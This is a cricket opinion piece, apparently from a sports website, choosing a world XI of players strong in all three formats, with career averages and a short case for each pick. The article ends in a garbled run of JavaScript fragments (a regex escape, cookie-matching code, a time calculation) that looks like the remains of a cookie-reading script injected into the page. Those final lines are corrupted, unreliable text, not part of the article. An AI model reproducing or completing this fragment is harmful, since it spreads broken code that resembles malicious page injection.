We have put together a world XI, made up of players who excel at all three formats of world cricket.

What do you think of our team?

Dave Warner (AUS)

Batting average: Test: 49.10 ODI: 35.91 T20: 28.96

A must have as one of the two opening batsman. Warner burst onto the scene as a T20 star, before cementing his place in the ODI side and finally the Test side. He has proven over the past 12-18 months in particular that he can play both aggressively for the shorter formats and also in a more tempered way for Test cricket. His blistering batting and scoring rate can take the game away from the opposition in a few overs.

Joe Root (ENG)

Bat avg: Test: 54.90 ODI: 41.94 T20: 41.83

Joe Root has been one of the best batsmen in the world over the past two years. He is the No. 4 Test batsman in the world and is also putting together an impressive resume in the shorter formats of the game. He would be the perfect opening partner for Warner, as he would compliment Warner's aggression, with his own measured approach.

Hashim Amla (SA)

Bat avg: Test: 52 ODI: 52.70 T20: 25

Amla is the No. 6 ranked Test batsman in the world and the No. 5 ranked ODI batsman in the world. He has a sublime technique and can also change a game within minutes. There are few players in world cricket that can play as effortlessly as Amla when he is on song.

Virat Kohli (IND)

Bat avg: Test: 44.12 ODI: 50.60 T20: 44.17

Kohli is another batsman who is outstanding to watch. At his best, he is almost impossible to dismiss. His Test average of 44.12 should arguably be higher given his talent. However, he has shown enough to warrant selection. His T20 average of 44.17 is unheard of.

Steve Smith (AUS)

Bat avg: Test: 55.15 ODI: 39.22 T20: 19.84

Steve Smith is currently the No.2 Test batsman in the world. He has enjoyed a stellar 18 months and has established himself as one of the superstars of the games. He does not have a conventional technique and he is very fidgety at the crease. However, it matters little as he has gone about cementing his mark as a great Australian batsman.

AB de Villiers (wk) (SA)

Bat avg: Test: 51.92 ODI: 54.21 T20: 22.88

There is almost nothing that AB de Villiers cannot do. The South African star is the No.1 ranked batsman in the world in both Test cricket and ODI cricket. The 31-year-old hit the fastest century in ODI history earlier this year, smashing 100 off just 31 balls, before finishing on 149 runs off an astonishing 44 balls. He used to keep wicket for the Proteas, before giving up the role to focus on his batting. However, we're giving him the gloves in this team, to ensure a very strong batting line up.

Kane Williamson (NZ)

Bat avg: Test: 47.19 ODI: 48.02 T20: 29.20

Kane Williamson really made his mark over the last 12 months as one of the best batsman in world cricket. He has enjoyed a brilliant series against Australia, scoring two centuries in as many Tests. He also enjoyed a fantastic world cup earlier this year.

Ravi Ashwin (IND)

Bat avg: Test: 32.17 ODI: 16.84 T20: 22

Bowling avg: Test: 27.54 ODI: 31.27 T20: 26.96

Ravi Ashwin has 157 wickets in 30 Tests for India and has a very record with both bat and ball, making him the perfect addition to this line up as the full time spinner. Her has 13 five wicket hauls and also has two Test centuries to his name.

Mitchell Starc (AUS)

Bat avg: Test: 26.00 ODI: 20.37 T20: 3.00

Bowl avg: Test: 31.35 ODI: 19.65 T20: 19.53

Mitchell Starc has become arguably the best ODI bowler in the world over the past few years and he is without doubt the best yorker bowler in world cricket. Recently he has also improved his red ball bowling. There are definitely those who are above him in the pecking order in Test cricket, however, his shorter form bowling is enough to earn him a place in the side.

Dale Steyn (SA)

Bowl avg: 22. 56 ODI: 25.93 T20: 15.98

Dale Steyn has over 400 Test wickets in 81 matches at a simply outstanding average of just 22.56. His ODI and T20 bowling is also second to none. Can bowl with unbelievable pace and movement, making life very difficult for batsmen.

James Anderson (ENG)

Bowl avg: Test: 28.96 ODI: 29.22 T20: 30.66

James Anderson is the master of swing bowling. Performs best at Test level, but he is still a very handy bowler in ODI cricket. He has 426 Test wickets and almost 300 ODI wickets, making him one of England's all-time greats. "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
